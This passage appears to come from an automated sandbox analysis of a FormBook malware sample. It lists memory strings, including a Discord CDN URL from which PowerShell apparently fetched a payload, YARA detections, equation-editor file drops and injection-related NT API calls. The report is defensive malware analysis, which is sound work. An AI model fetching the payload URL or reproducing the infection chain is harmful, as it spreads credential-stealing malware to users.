          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.etmall.com.tw/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.excite.co.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.expedia.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2220685790.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.expedia.com/pub/agent.dll?qscr=mcst&strt1=%1&city1=%2&stnm1=%4&zipc1=%3&cnty1=5?http://ww
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gismeteo.ru/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.gmarket.co.kr/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.in/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.jp/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.co.uk/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.sa/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com.tw/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.cz/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.es/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.fr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2217921956.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2232348196.000000000B320000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 0000000C.00000000.2232348196.000000000B320000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2217758018.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 0000000C.00000000.2231465061.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.disc
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attac
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/85879332208771075
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/858793322087710753/863891
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/858793322087710753/86389185760801590
          Source: powershell.exe, 00000008.00000003.2176127886.0000000003BA0000.00000004.00000001.sdmp String found in binary or memory: https://cdn.discordapp.com/attachments/858793322087710753/863891857608015902/oad.jpg
          Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49166
          Source: unknown Network traffic detected: HTTP traffic on port 49166 -> 443
          Source: unknown HTTPS traffic detected: 162.159.130.233:443 -> 192.168.2.22:49166 version: TLS 1.2

          E-Banking Fraud:

          Yara detected FormBook
          Source: Yara match File source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPE
          Source: Yara match File source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara match File source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara match File source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORY

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.calc.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 11.2.calc.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2269086957.0000000000140000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2364869703.0000000000830000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2364447534.00000000000C0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000D.00000002.2364843590.0000000000800000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2269432200.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000B.00000002.2269237577.0000000000270000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\obi[1].exeJump to dropped file
          Very long command line foundShow sources
          Source: C:\Users\Public\vbc.exeProcess created: Commandline size = 4201
          Source: C:\Users\Public\vbc.exeProcess created: Commandline size = 4201
          Source: C:\Windows\SysWOW64\calc.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\calc.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and write
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00419D50 NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00419E00 NtReadFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00419E80 NtClose,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00419F30 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00419D4B NtCreateFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00419DFB NtReadFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00419E4A NtClose,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00419E7A NtClose,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A000C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A00078 NtResumeThread,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A00048 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFC90 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFEA0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A010D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A00060 NtQuerySection,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A001D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A0010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A01148 NtOpenThread,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A007AC NtCreateMutant,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A01930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFAB8 NtQueryValueKey,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFB50 NtCreateKey,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFC30 NtOpenProcess,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFC48 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A00C40 NtGetContextThread,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00A01D80 NtSuspendThread,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFD5C NtEnumerateKey,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFE24 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFFFC NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_009FFF34 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00199862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00199DAE NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\calc.exe | Code function: 11_2_00259862 NtQueryInformationProcess,RtlWow64SuspendThread,NtSetContextThread,NtQueueApcThread,NtResumeThread,NtClose,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020B00C4 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020B07AC NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFAB8 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFAD0 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFAE8 NtQueryInformationProcess,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFB50 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFB68 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFBB8 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AF900 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AF9F0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFED0 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFFB4 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFC60 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFD8C NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFDC0 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020B0048 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020B0060 NtQuerySection,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020B0078 NtResumeThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020B10D0 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020B010C NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020B1148 NtOpenThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020B01D4 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFA20 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFA50 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFBE8 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AF8CC NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AF938 NtWriteFile,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020B1930 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 13_2_020AFE24 NtWriteVirtualMemory,
